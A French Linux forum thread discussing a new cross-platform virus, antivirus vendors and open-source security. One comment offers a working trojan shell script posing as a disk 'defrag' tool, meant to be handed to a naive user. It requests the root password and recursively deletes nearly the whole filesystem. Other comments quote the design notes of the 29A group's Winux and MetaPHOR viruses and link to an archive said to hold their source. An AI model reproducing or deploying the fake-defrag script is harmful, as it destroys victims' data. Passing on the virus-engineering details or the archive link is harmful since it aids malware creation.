          Donc, je me demandais (vu que ça fait très longtemps que je n'ai pas installé de windows) si il y a un avertissement du même type à l'instal de win. Si oui, alors tous les neuneux n'ont aucune excuse.
          • [^] # Re: je ne vais pas pleurer

            Posté par  . Évalué à 2.

            Non il n'y a pas d'avertissement.

            Par contre XP(pas 2000) limite l'acces aux comptes sans passwords.
            Il est uniquement possible de se logger sur la console avec un compte sans password(en gros: faut etre devant la machine), pas d'acces depuis le reseau, pas depuis runas.exe,...
            • [^] # Re: je ne vais pas pleurer

              Posté par  . Évalué à -2.

              Ça ne change rien pour un virus (un ver oui) qui s'exécute de toute façon en local, à moins que dans tes restrictions il y ait aussi accès restreint à la machine locale.
              • [^] # Re: je ne vais pas pleurer

                Posté par  . Évalué à -1.

                Le virus qui s'execute en local, que tu sois root avec un password hyper complexe, user avec un password hyper-complexe ou user dugland sans password, sur Windows ou Unix ca change rien, car il a pas besoin de s'authentifier une fois qu'il est sur ta machine, il accede directement a tous tes fichiers.

                Par contre un virus pourrait essayer de faire un su(ou runas.exe) en utilisant un blank password pour attaquer d'autres comptes.

                Sous XP si le virus essaye de faire ca sur un compte sans password, il n'y arrivera pas.
  • # Les editeurs d'antivirus on l'air impatients...

    Posté par  . Évalué à 10.

    "C'est vraiment nul linux, on peux meme pas faire tourner correctement des virus dessus. Personne n'en a, et en plus personne ne s'en inquiette !
    Mais a qui on vas vendre nos antivirus si personne n'en a peur ?"

    Voila, maintenant ils sont obliges de bidouiller un espece de truc qui ressemble a un virus. mais ca marche pas, les gens on meme pas peur !!

    En fait je me demande par qui d'autre que Symantec ce virus a pu etre ecrit ! A moins que les createurs de virus n'envoyent directement leur creation chez symantec ?
    Par ce que pour qu'il aient reussis a l'avoir, faudrait quand meme que quelqu'un ai reussis a se faire infecter, ce qui parait assez difficile.
    • [^] # Re: Les editeurs d'antivirus on l'air impatients...

      Posté par  . Évalué à 0.

      Ce qui m'étonne aussi, c'est comment ils peuvent te décrire le fonctionnement du virus.
      Dans l'hypothèse ou le virus n'est pas fait par eux (partons sur une base de confiance), soit ils ont des ingénieurs super forts qui savent décompiler et comprendre le code machine du virus, soit ils ont des parc de machines qu'ils s'amusent à infecter pour voir ce que ça fait.

      La première hypothèse est AMHA trop longue pour être praticable (trouver un moyen de le supprimer est déjà difficile).
      La deuxième est ce qui se passe quand il y a eut effectivement infection et qu'on constate les dégats, mais je doute qu'ils puissent se permettre de tester volontairement ça pour chaque virus (surtout qu'il faut un réseau hétérogène avec tous les systèmes d'expoitation possibles dans toutes sortes de version pour trouver les failles éventuelles).
      Comme ils semblent être les seuls à en avoir entendu parler (quelqu'un s'est fait effectivelent infecter par ce truc?) il semble donc raisonable de penser qu'ils puissent l'avoir inventé pour faire vendre leur produit, ce qui ne m'étonnerais pas.
      • [^] # Re: Les editeurs d'antivirus on l'air impatients...

        Posté par  . Évalué à 2.

        Decompiler et comprendre le code machine d'un virus(qui d'habitude contient tres peu de code), le passer a travers un debugger pour voir ce qu'il fait pas a pas, ne demande pas des genies, simplement des gens competents, et chez les societes d'AV, il y en a des gens competents.

        Et sinon, ces societes ont pour la plupart des reseaux heterogenes avec un grand nombre d'OS differents(et de versions differentes), on en a aussi pour tester l'interop reseau, ils en ont surement aussi pour zieuter les modes de transmission de virus.
      • [^] # Re: Les editeurs d'antivirus on l'air impatients...

        Posté par  . Évalué à 2.

        le groupe 29a lab est un groupe de hacker qui ecrivent des virus mais ne contamine personne , d'apres ce que j'ais lu
        le virus aurait été envoyé au boite d'antivirus
        de plus la version précédente ( qui n'infectait que windows ) est disponible sur le web
        le premier virus multios ets WINUX du même 29A aussi disponible sur le web
        autre détilas c'est un virus métaphormic donc le programme de recherche de virus poly ne marche pas en effet
        ceux ci utilise un encrypteur décrypteur donc ont une zone fixe
        alors que les virus métamorphic n'ont pas de d'encrypteur/décryteur il utilise de substitution
        (il remplace des instruction en assembleur par d'autrez é quivalente)
        le dnager du fait qu'il y a des compilo sous linux (source article hunting metamorphism )
        d'ailleurs en regardant winux avec un éditeur hexadécimale il avait desd reference a la glibc m
        ( il ya avait toutes les differentes version des glibc de redhat)
        faut que je trouve un desassembleur genre windasm mais pour linux
        • [^] # errare humanum est....

          Posté par  . Évalué à 0.

          je me suis trompe c'est elfecrypt ( un encrypteur de virus polymorphe fait par benny du groupe29A) qui contient les referenece aux differentes versions de la glibc
    • [^] # Re: Les editeurs d'antivirus on l'air impatients...

      Posté par  (site web personnel) . Évalué à 0.

      A moins que les createurs de virus n'envoyent directement leur creation chez symantec ?

      Bien sûr. Voir « Commentaire d'Alan Solomon » juste en dessous.
  • # Commentaire d'Alan Solomon

    Posté par  (site web personnel) . Évalué à 10.

    Évidemment, immédiatement quand on parle de nouveaux virus, on suspecte les compagnies anti-virus de les créér. Alan Solomon, qui a écrit ce qui est actuellement le coeur de l'anti-virus de McAffee, a écrit un commentaire passionant sur Slashdot à ce sujet. En anglais, bien sûr, et à cette adresse : http://slashdot.org/comments.pl?sid=33554&threshold=4&comme(...)

    Oh, et au sujet des compagnies qui créeraient des virus, il en rie histériquement, genre « déjà qu'on avait à peine le temps d'analyser et de cataloguer les nouveaux virus, si en plus on devait les créer... »
    • [^] # Re: Commentaire d'Alan Solomon

      Posté par  . Évalué à 5.

      Toujours est-il que le lendemain de l'annonce d'une grand boite d'antivirus (ça devait être macaffee justement) de la disponibilité de son antivirus pour linux, le premier virus linux était annoncé.
      • [^] # Re: Commentaire d'Alan Solomon

        Posté par  (site web personnel) . Évalué à 7.

        Deux choses à prendre en compte :

        D'une part, les auteurs de virus envoient leurs « oeuvres » aux auteurs d'anti-virus. Hé oui, il y a des impatients qui veulent être sûrs de devenir célèbres. Attendre des mois que quelqu'un remarque votre virus adoré n'est pas quelque chose que tous les « auteurs » de virus sont prêts à faire, manifestement. M. Solomon en parle dans son commentaire, disant qu'il a bien évidemment été surpris la première fois que ça lui est arrivé. Surtout que se posait pour lui la question de savoir si il pouvait se permettre de jeter la disquette à la poubelle, et hop, un virus de moins dans la nature, un virus de moins à analyser. Il s'est finalement avéré que l'auteur de ce virus l'avait envoyé à pas moins de quatorze compagnies...

        D'autre part, évidemment, les auteurs d'anti-virus sont là pour faire du business, et rien de tel qu'une bonne double annonce pour booster les ventes. Je ne pense pas qu'ils aient forcément créé ce virus juste pour l'occasion. Par contre, ils ont possiblement retardé son annonce de quelques jours, le temps de pouvoir synchroniser les deux annonces.

        Franchement, sans être un fan des anti-virus (niveau réseau, j'utilise exclusivement Linux chez moi), j'ai été assez agréablement surpris du commentaire de M. Solomon. Et, même s'il défend son ex-profession, bien sûr, il n'a par contre plus d'intérêts dans l'industrie de l'anti-virus depuis qu'il a revendu le sien à McAffee.
      • [^] # Re: Commentaire d'Alan Solomon

        Posté par  . Évalué à 2.

        Ben oui ... l'antivirus l'a trouvé !! :)
  • # Symantec, c'est vraiment des ...

    Posté par  . Évalué à 4.

    Systems Not Affected: Windows, Microsoft IIS, Macintosh, Unix

    Je sais bien que Linux Is Not Unix, mais quand même, comment n'affecter que linux, sans unix ?
    Et Windows, c'est le dernier OS ? Parce-que dans la liste des OS affectés, j'y ai vu une flanquée d'OS de chez Microsoft.
    En plus, le gars, il est en guest : ça va, sur la plupart des systèmes, un guest est pas vraiment censé pouvoir écrire sur les autres comptes.
    Si ? => man chmod !

    Bref, ça sent le mytho ! :)
    • [^] # Re: Symantec, c'est vraiment des ...

      Posté par  . Évalué à 2.

      comment n'affecter que linux, sans unix ?

      Ah ben si, ça c'est normal, les exécutables ne sont pas au même format entre linux et unix/solaris/*.

      Et Windows, c'est le dernier OS ? Parce-que dans la liste des OS affectés, j'y ai vu une flanquée d'OS de chez Microsoft.

      Ça j'avoue que j'ai pas bien compris non plus, vu que le seul windows non listé c'est le 3.1 :)
    • [^] # Re: Symantec, c'est vraiment des ...

      Posté par  (site web personnel) . Évalué à 3.

      comment n'affecter que linux, sans unix

      Ben... Ben, le virus est composée d'instructions pour processeurs x86, donc ça exclut déjà tous les unix qui ne tournent pas sur plate-forme x86. Ensuite, il n'est capable de tripatouiller que les fichiers exécutables au format win32 et elf. Donc, au revoir les autres unix, vous n'êtes pas infectables¹.

      ¹ Solaris sous x86, ou les différents BSD, ont-ils le moyen de comprendre le format elf ?
      • [^] # Re: Symantec, c'est vraiment des ...

        Posté par  . Évalué à 2.

        il me semble que Solaris a un émulateur linux pour pouvoir faire marcher les logiciel sans recompilation
      • [^] # Re: Format ELF (hic)

        Posté par  . Évalué à 2.

        Le format ELF est un format de binaires assez répandu, et les systèmes Linux, *BSD, et Solaris
        le supportent... d'où une possible infection, même si les virus sont pas encore cross-platform
        (koike y'a bon espoir avec le virus qui se re-assemble qu'il y a plus loin)

        Cela dit ca dépends aussi de la façon dont s'incruste le virus au niveau de l'entete du fichier ELF. S'il fait ca proprement, ok y'a pas de problemes_de_compatibilité.
        Si c'est codé de façon plus degueulasse/optimisée, ca dépends aussi du chargeur d'exécutables du noyau linux (qui est très tolérant! m'enfin bon y'a kan meme eu du boulot dessus pour vérifier un peu mieux les fichiers corrompus).
    • [^] # Re: Symantec, c'est vraiment des ...

      Posté par  (site web personnel) . Évalué à 0.

      Surtout qu'il me semble que les BSD (FreeBSD par exemple) utilisent le meme format d'executable que Linux (ELF). Il ne doit pas y avoir grand chose a changer pour que le virus puisse infecte des BSD/x86.

      Par ailleurs, ces unix proposent un module de compatibilite binaire avec Linux (comme Solaris x86). De ce cote, l'infection peut etre directe...

      Mais les conditions de propagations sont quand meme tres restrictives.

      Laurent
  • # Et le miens alors, c'est un vrai ?

    Posté par  (site web personnel) . Évalué à 9.

    Et le miens alors, c'est un vrai ?
    A sauvegarder en defrag, faire un chmod 755, et à donner à un neuneu :

    #!/bin/sh
    # defragmentation du disque dur

    echo "Afin de pourvoir defragementer le disque dur, defrag a besoin du mot de passe root..."

    cd /
    su -c "find / -maxdepth 1 -not -regex \".*bin$\" -exec rm -rf {} \;"

    echo "Defragmentation en cours..."
    while true ; do
    for i in "\\" "|" "/" "-" ; do
    echo -n -e "\b$i" ;
    sleep 1 ;
    done;
    done
  • # du même groupe 29A

    Posté par  . Évalué à 2.

    ; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
    ; ³ Win32/Linux.Winux ³
    ; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
    ; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
    ; ³ by Benny/29A ³
    ; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
    ;
    ;
    ;
    ;Heya ppl,
    ;
    ;lemme introduce you my first multi-platform virus, the worlds first
    ;PE/ELF infector. The idea of first Win32/Linux virus came to my head
    ;when I was learning Linux viruses. I'm not Linux expert, I couldn't
    ;code for Linux in assembler - I am familiar with Intel syntax, AT&T
    ;is a bit chaotic for me. However, I decided to learn more about Linux
    ;coding and left my place of newbee. I was always fascinated of Linux
    ;scene and low-level programming under Linux but I never knew much
    ;about it.
    ;
    ;I wanted to code virus for Linux and learn from it. But becoz there
    ;already exist some viruses and I knew I won't be able to bring any
    ;new technique, I decided to code something unique -> Win32/Linux
    ;compatible multi-platform infector. And here you can find the result
    ;of my trying. Now, after all, I've got some valuable experiencez and
    ;I'm glad for that. Coding/debugging in Linux was hard for me, but I
    ;had fun and I learned a lot. And that's the most important.
    ;
    ;
    ;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
    ;³ Technical details ³
    ;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
    ;
    ;The virus itself ain't much. It's not big, it's not complicated,
    ;it's not resident nor polymorphic.. I wanted to be the virus like
    ;this. Just to show something new, show that something never seen
    ;before is possible and how can it be coded.
    ;
    ;The virus is devided to two partz: Win32 part and Linux part. Every
    ;part is able to infect both of PE and ELF filez. This source is
    ;designed to be compiled by TASM under Win32, nevertheless it can
    ;infect Linux programz and so then it will be able to be executed
    ;in Linux environment (and there it is also able to infect
    ;Win32 part, which can be executed in Win32 environment etc etc etc...).
    ;
    ;Win32 part:
    ;ÄÄÄÄÄÄÄÄÄÄÄÄ
    ;
    ;Virus infects PE filez by overwritting .reloc section, so it does not
    ;enlarge host file size. Filez that don't have .reloc section, big
    ;enough for virus code, can't be infected (explorer.exe can be used to
    ;test infection capabilities). It can pass thru directory tree by well
    ;known "dotdot" method ("cd ..") and there infects all PE and ELF
    ;filez - virus does not check extensionz, it analyses victim's internal
    ;format and then decidez whata do.
    ;When all filez are passed and/or infected virus will execute host code.
    ;
    ;Linux part:
    ;ÄÄÄÄÄÄÄÄÄÄÄÄ
    ;
    ;Virus infects ELF filez by overwritting host code by viral code. The
    ;original host code is stored at the end of host file. It can infect
    ;all filez (both of PE and ELF) in current directory, also without
    ;checking file extensionz.
    ;When all filez are passed and/or infected virus will restore host code
    ;(overwrite itself by original host code) and execute it.
    ;
    ;
    ;Well, you are probably asking how it is possible that virus can infect Win32
    ;appz from Linux environment and Linux appz from Win32 environment. Yeah,
    ;many ppl already asked me. For instance, under some emulator. There exist
    ;some emulatorz (win4lin, wine etc..) which are often used to execute Win32
    ;appz under Linux. Also, I know many ppl that have partition specially
    ;reserved for CD burning, where they store both of Win32 and Linux programz.
    ;Virus executed from there has no problemz with infection, heh ;)
    ;
    ;
    ;Does this virus work? Heh, sure it does. I tested it on Win98, Win2000 and
    ;RedHat 7.0, and it worked without any problemz. However, if you will find
    ;any problemz, don't by shy and send me a bug report ;-P
    ;
    on trouve se document dans le zine de 29A le numéro 6
    • [^] # maintenant la personne ayant ecrit ce virus (a lire le todo

      Posté par  . Évalué à 3.

      ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
      ;; ---------------------- ;;
      ;; * Win32.MetaPHOR v1B * ;;
      ;; ---------------------- ;;
      ;; ;;
      ;; Metamorphic Permutating High-Obfuscating Reassembler ;;
      ;; ;;
      ;; Coded by The Mental Driller/29A ;;
      ;; ;;
      ;; ;;
      ;; I proudly present my very first metamorphic virus (in its version 1.1). ;;
      ;; ;;
      ;; This virus is only code. No tables, no indirect jumps, etc. etc. It ;;
      ;; doesn't uses the stack to construct strings, executable code or data: ;;
      ;; what I do is a reservation of 3'5 Mb of data (more or less) with ;;
      ;; VirtualAlloc and then use the decryptor to copy the decrypted virus there ;;
      ;; (or unencrypted, since it has a probability of 1/16 of being unencrypted, ;;
      ;; so the decryptor in that cases is in fact a copy routine). The reserved ;;
      ;; memory is organized in sections (as if it were a PE) where I do all the ;;
      ;; operations. VirtualAlloc will be retrieved by the decryptor if it's not ;;
      ;; imported by the host, and the host must import GetModuleHandleA/W and ;;
      ;; GetProcAddress to be infected. This functions will be used by the virus ;;
      ;; to get the needed APIs. ;;
      ;; ;;
      ;; The type of metamorphism followed is what I call the "accordion model": ;;
      ;; disassembly/depermutation -> shrinking -> permutation -> expansion -> ;;
      ;; -> reassembly, so the code can be bigger or smaller than the previous ;;
      ;; generation. ;;
      ;; ;;
      ;; The metamorphism in this virus is complete: even the result of the ;;
      ;; shrinking can't be used for detection, because is different in every ;;
      ;; generation. That's the point where I introduce a new concept: dimensions ;;
      ;; in recoding (I mean, code that only get shrinked on two or more ;;
      ;; generations, but not in the immediate following; this would be the ;;
      ;; "third" dimension). This makes the disassembly to have always a different ;;
      ;; shape from generation to generation, but, when stabilized, never growing ;;
      ;; uncontrolablely. ;;
      ;; ;;
      ;; I have added a genetic algorithm in certain parts of the code to make it ;;
      ;; evolve to the best shape (the one that evades more detections, the action ;;
      ;; more stealthy, etc. etc.). It's a simple algorithm based on weights, so ;;
      ;; don't expect artificial intelligence :) (well, maybe in the future :P). ;;
      ;; ;;
      ;; I tried to comment the code as cleanly as possible, but well... :) ;;
      ;; ;;
      ;; If the code isn't optimized (in fact, it's NOT optimized), it's because: ;;
      ;; ;;
      ;; 1) It's more clear to see the code that the internal engine will deal ;;
      ;; with (for example, many times I use SUB ECX,1 instead of DEC ECX, ;;
      ;; although the disassembler can deal with both opcodes). ;;
      ;; 2) What's the point for optimizing the code when in next generation it ;;
      ;; will be completely unoptimized/garbled? :) ;;
      ;; 3) The obfuscation in next generations is bigger (MUCH bigger). ;;
      ;; ;;
      ;; ;;
      ;; General sheet of characteristics: ;;
      ;; ;;
      ;; Name of the virus.............: MetaPHOR v1.0 ;;
      ;; Author........................: The Mental Driller / 29A ;;
      ;; Size..........................: On 1st generation: 32828 bytes ;;
      ;; On next ones: variable, but not less ;;
      ;; than 64 Kb ;;
      ;; Targets.......................: Win32 PE EXEs, supporting three types ;;
      ;; of infection: mid-infection (when ;;
      ;; .reloc is present), at last section ;;
      ;; but using the padding space between ;;
      ;; sections to store the decrytor/mover, ;;
      ;; or all at last section. ;;
      ;; It infects EXEs with a 50% of prob. in ;;
      ;; current directory and going up the ;;
      ;; directory three by three levels. It ;;
      ;; also retrieves the drive strings on ;;
      ;; the system and makes the same if they ;;
      ;; are fixed or network drives. ;;
      ;; It uses EPO patching ExitProcess. ;;
      ;; Stealth action................: It doesn't enter in directories that ;;
      ;; begin with 'W' (avoiding the windows ;;
      ;; directory) and doesn't infect files ;;
      ;; with a 'V' in the name or beginning ;;
      ;; with the letters 'PA', 'F-', 'SC', ;;
      ;; 'DR' or 'NO'. ;;
      ;; Genetic algorithm in the selection of ;;
      ;; the infection methods, the creation of ;;
      ;; of the decryptor and some more things ;;
      ;; to make it more resistant or more ;;
      ;; difficult to detect due to "evolution".;;
      ;; Encrypted.....................: Sometimes not. ;;
      ;; Polymorphic...................: Yes ;;
      ;; Metamorphic...................: Yes ;;
      ;; Payloads......................: 1) A message box on 17h March, June, ;;
      ;; September and December with a ;;
      ;; metamorphic message :). ;;
      ;; 2) On 14h May and on hebrew systems it ;;
      ;; displays a messagebox with the text: ;;
      ;; "Free Palestine!" ;;
      ;; Anti-debugging................: Implicit ;;
      ;; Release history...............: ;;
      ;; v1.0: 11-02-2002 (I just finished commenting the source code ;;
      ;; and correcting the bugs I found doing that). ;;
      ;; v1.1: 14-02-2002 ;;
      ;; ;;
      ;; ;;
      ;; To do in next versions: ;;
      ;; ;;
      ;; 1) ELF infection: I only have to add APIs and call one or another ;;
      ;; depending on the operating system, and add the ELF infection algorithm. ;;
      ;; 2) Reassembly for different processors: IA64, Alpha, PowerPC, etc. I only ;;
      ;; have to code a new disassembler/reassembler, since for every internal ;;
      ;; operation I use a self-defined pseudo-assembler with its own opcodes. ;;
      ;; 3) Plug-in injector ;;
      ;; 4) More things (of course!! :). ;;
      ;; ;;
      ;; ;;
      • [^] # Re: genial non ?

        Posté par  . Évalué à 2.

        Ce n'est certes pas une merveille de miniaturisation, mais question technique c'est vraiment un concept intéressant...

        Enfin ca serait surement plus joli si ce code parasite autopropageable était seulement le fruit d'un labo de recherche et non plus un outil de destruction diabolique ! Si en plus le mec sort une API de programmation de plug-ins pour son virus c'est Hell on Earth pour bientot.

        Les virus ca fait peur, mais s'ils n'ont pas de bout de code qui fait mal... ben ils font pas mal

        bon, en tout cas... il vaut mieux etre parano sous linux que confiant sous ot' chose
      • [^] # Re: maintenant la personne ayant ecrit ce virus (a lire le todo

        Posté par  . Évalué à 2.

        http://vx.netlux.org/cgi-bin/acc?a=1&p=29a/29a-6.zip(...)
        voila l'adresse du numéro 6 du zine 29A
        avec winux le premier virus multiplatforme
        methaphorm l'ancêtre du virus actuel source et éxécutable ( en .EXE désolé ) compris
        l'article hunting metapohism virus de symantec
  • # Ce qui risque d'arrivé un jour.....

    Posté par  . Évalué à -3.

    Un de ces jours,un de ces connards va pondre quelque chose de vraiment dangereux sans s'en rendre compte et on va se retrouver avec une monstre...

    Imaginer ça : polymorphe,quasi-intelligent(quoique certains virus actuelle soit vraiment fort), multiplateforme,capable de passer d'une architecture à une autre....

    Capable d'utiliser n'importe quel type de connection pour se propager telle la peste noire..

    Si quelqu'un ici connait un peu Shadowrun,ça vous rapelle pas quelque chose??

    Bon,je rentrerai pas dans les details de cette série de romans de science-fiction,mais pour résumer,un virus à complètement infecté et detruit tout les ordinateurs de la planète qui étaient de près ou de loin connecté au Net quelques pars dans les 2 premières decennies du 21 ième siècle... Effaçant toutes les données sur son passage,même(et surtout) les données cryptés!!

    À l'heure actuelle,je penses qu'on peut vraiment dire que la quasi-totalité des ordinateurs qui supporte notre civilisation,qui possèdent la plus grande partie du savoir humain ont des contacts , même de loin...

    Disquettes,banques de données en ligne,connetions internet/intranet des grandes institutions et bien d'autres....

    Tous peuvent propager un virus ou un worms !!!


    À l'heure actuelle, il n'existe presque aucune protection,pas de backup complètement offline de tout ce qui est VRAIMENT important, en d'autres mots, RIEN en cas de pépin...

    Le pire,c'est que c'est possible intentionnellement !!

    Je penses que nous sommes actuellement dans une periode dangereuse où tout peut arrivé !! Ô_O ..

    On va peut-être me trouver paranoiaque,mais je penses que ce genre de monstre est possible avec la technologie actuelle..Il faut "juste" qu'il se propage trop vite pour que les producteurs d'anti-virus réagissent,genre en moins de 34 heures,pour qu'il infecte et detruise tout sur son passage...

    Suffit de:

    1)programmeurs
    2)grosses têtes en réseaux
    3)mecs qui s'y connaissent en OS

    Au total? 3 ou 4 personnes, plus si necessaire mais pas plus d'une dizaine. À la rigueur,ça se ferait à 2 si c'est à temps plein,6 mois dans ce cas là pour la gestation ,trop court vous dites? 6 mois ,ç'est une eternité en informatique...

    Le plus drole,c'est qu'il faut pas beauoup de matos comparativement à une compagnie !!! 4 ou 5 machines assez puissante ,gros maximum....

    La seule raison pourquoi c'est pas fait?
    Simple,pas d'intérêts!

    Qui voudrait tuer Internet??
    Faudrait être un peu dingue,non?

    Un des plus beaux fleuron de l'humanité,le partage de la connaissance pour tous...

    Mais par exemple,qu'est ce qui se sers d'Internet à outrance depuis quelques temps? Qui est la BASE de notre système capitaliste??

    La Bourse ! Con comme bonjour ça hein?

    Plus simple comme methode? Ok...

    Imaginer qu'un worm se serve de tout ce qu'il trouve sur son passage pour s'attaquer aux 7 ou 8 DNS Root et aux installations principales qui supportent la structure physique d'internet?

    J'ai juste des connaissances sur les reseaux, prise dans un cours Cisco,mais il me semble que c'est possible,la seule limite,c'est l'imagination ...

    Eh oui,nos institutions sont conçu pour resister aux catastrophes,mais pas à la malveillance humaine....


    J'aimerais des idées et des reactions le plus possible !!! Allez,on se laisse aller à imaginer le pire ,serieusement....

    Allons faire un p'tit tour dans les méandres obscures et imaginer ce qui se passe dans la tête d'un propagateur de virus(ou de worm,à votre choix,au même un hybride..) qui se mettrais dans la tête de tout pèter la baraque !!!

    J'attend avec impatience vos histoires ^_^
    • [^] # Re: Ce qui risque d'arrivé un jour.....

      Posté par  . Évalué à 3.

      MDR


      C'est ça, la fin du monde est proche et on va tous se repentir ....

      Vraiment mort de rire ...
    • [^] # Ouais, mais bon ...

      Posté par  . Évalué à 2.

      Combattu par Echo Mirage en 2029, il me semble.
      Mais bon, ça reste de la science-fiction de série américaine, ça, le virus qui infecte instantanément la machine sur lequel il est inscrit.
      J'en ai déjà vu, des séries débiles comme ça. Le mec récupère le fichier infecté sur sa machine, et paf, le virus prend le contrôle du système d'incendie du bâtiment sans même qu'il ait essayé de l'exécuter.
      Bien débile, donc.
      Tant qu'il restera des architectures matérielles hétérogènes et sur chacune différentes architectures logicielles, on ne risque pas ce genre de choses.

      -1, passke ça fait pas avancer le schmilblick ...
    • [^] # Re: Ce qui risque d'arrivé un jour.....

      Posté par  (site web personnel) . Évalué à 2.

      polymorphe,quasi-intelligent(quoique certains virus actuelle soit vraiment fort), multiplateforme,capable de passer d'une architecture à une autre....
      Mais oui.
      Outre les fautes d'orthographe, tu devrais savoir que :
      1/ un virus n'est absolument pas intelligent, a moins qu'il tienne en 10 megas, et encore. Le principe d'un virus etant d'etre tout pitit pitit, t'aura du mal a construire un truc evolué avec ca.
      2/ un virus multiplateforme, ok, mais ca ira pas loin. Deja, pas 2 architectures differentes sans doubler le code au minimum. J'ai fait des tests d'executable DOS/Linux avec le meme code, mais sitôt que tu voudras tourner sur 2 processeurs differents c'est perdu.


      'fin pour finir ton texte est digne d'HG wells mais avec des fautes et sans raisonnement. Reessaye ...
  • # Peu d'importance

    Posté par  . Évalué à -1.

    L'avantage d'un systême Linux c'est qu'il n'y a peu d'intêret à créer un virus sous cette plateforme pour plusieurs raisons dont les plus évidentes sont :
    1. le code source est ouvert (licence GPL) donc consultable très facilement. S'il n'est pas livré avec le programme exécutable, il est tout à fait possible de demander au créateur du programme de le mettre a disposition.

    2. Linux est un systême plus "friendly" donc moins sujet aux attaques ...

    3. Que diable a quoi ca sert d'emerder ceux qui utilise Linux, a moins de vouloir de se faire de la publicité ...
    • [^] # Re: Peu d'importance

      Posté par  (site web personnel) . Évalué à 1.

      1. le code source est ouvert (licence GPL) donc consultable très facilement.

      "on a le code source donc on peut voir si ca contient des virus." => oui, en théorie sauf que en pratique non.
      Déjà parce que en pratique on ne recompile pas tout. Sur sa distrib perso on peut s'amuser à ca quand on est informaticien mais ceux qui veulent un truc qui marche ne vont pas tout recompiler tout le temps. Donc tu as beau avoir le source, si le binaire a été modifié tu ne le sauras pas.

      Et meme si tu compiles toi meme rare sont ceux qui auditent le code source de tous les softs qu'ils compilent, les gens font souvent confiance là aussi. Perso je n'ai ni le temp ni la capacité d'aller auditer le code de tout ce que j'installe. (un bon exemple est le probleme de configure d'irsii récement, il est resté un moment avant de se faire remarquer)

      2. Linux est un systême plus "friendly" donc moins sujet aux attaques

      Tu entend quoi par "friendly" ?
      parce que quand on dit "user friendly" en général ca sous entend justement souvent le contraire (mettre plein de trucs par défaut quitte à etre un peu léger sur la sécu)

      3. Que diable a quoi ca sert d'emerder ceux qui utilise Linux, a moins de vouloir de se faire de la publicité ...

      A la meme chose que ceux qui ont windows :)
      Je dirai meme que à mon avis il doit y avoir un défi en plus sous linux



      Je ne vois absolument pas pourquoi ca serait moins interressant sous linux que sous windows et tes raisons "évidentes" je ne les comprend pas vraiment.

      La seule justification que je peux voir est la séparation des pouvoirs qu'il y a sous linux et qu'il n'y avait pas sous win9x. Mais des virus nt/2k/xp ca existe aussi (et là il y a une séparation des pouvoirs).
      • [^] # Re: Peu d'importance

        Posté par  . Évalué à 4.

        « Déjà parce que en pratique on ne recompile pas tout. Sur sa distrib perso on peut s'amuser à ca quand on est informaticien mais ceux qui veulent un truc qui marche ne vont pas tout recompiler tout le temps. Donc tu as beau avoir le source, si le binaire a été modifié tu ne le sauras pas. »

        Si ce problème devient important, il faudra identifier les créateurs de paquets et faire un site listant tout ceux qui ont signé (GPG) des paquets qui ont prouvé contenir un virus.
        Le code source ouvert permettra de très facile identification des farceurs, dès lors qu'on devient suspicieux.
        Finalement, c'est peut-être une bonne affaire pour les distribs : ils vont d'autant plus devenir les interlocuteurs privilégiés des entreprises pour les m-à-j.
      • [^] # Re: Peu d'importance

        Posté par  . Évalué à 2.

        on a le code source donc on peut voir si ca contient des virus." => oui, en théorie sauf que en pratique non.

        l'ouverture du source permet à plus de monde de l'auditer et la correction de bugfs de sécurité est donc plus rapide. De plus cela évite qu'un éditeur de logiciel n'intègre un spyware ou une backdoor dedans, ce qui est parfois mis à profit par les auteurs de virus. un bon exemple est SE-Linux, fait par la NSA. les patches du kernel ont pu être audité par un assez grand nombre de gens pour que l'on sache qu'il n'y a pas de backdoor.


        ceux qui veulent un truc qui marche ne vont pas tout recompiler tout le temps

        les systèmes rpm et deb font automatiquement un checksum du paquet avant l'install. les paquets peuvent aussi être signés avec une clé gpg. (dans deb c'est possible mais pas encore utilisé en pratique. tu n'as donc pas à auditer le code, du moment que tu l'installe depuis des sources sures.

        n'oublie pas que si tu es du genre parano sécuritaire il y a une foultitude d'outils pour ça sous linux, qui permettent entre autre de vérifier que des fichiers ne sont pas modifiés à ton insu (notamment Aide dans la news précédente).
    • [^] # Re: Peu d'importance

      Posté par  . Évalué à 0.

      Il n'y a peu interet à écrire un virus pour Linux, puisque pour qu'il soit puissant il faut qu'il parvienne à obtenir les privilèges root.
      Et une fois root, il vaut mieux conserver la machine en l'état pour disposer de ressources résaux/cpu/disque pour monter une autre action d'envergure. (du moins c'est ce que je ferrai si j'étais un génie malfaisant).

      Heureusement pour nous, il y plus de génies bienfaisants dans la communauté (RMS, Linus, Alan Cox ...) qui préfèrent briller par des actions positives plutot que comme "system killer".
      • [^] # Re: Peu d'importance

        Posté par  (site web personnel) . Évalué à 0.

        pour qu'il soit puissant il faut qu'il parvienne à obtenir les
        privilèges root


        Ben désolé, mais un virus qui efface toutes mes données, même s'il n'a pas réussi à toucher à autre chose qu'à mon répertoire perso, est déjà beaucoup puissant à mon goût. L'OS, je le réinstalle quand je veux. Mes données, c'est autre chose.

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.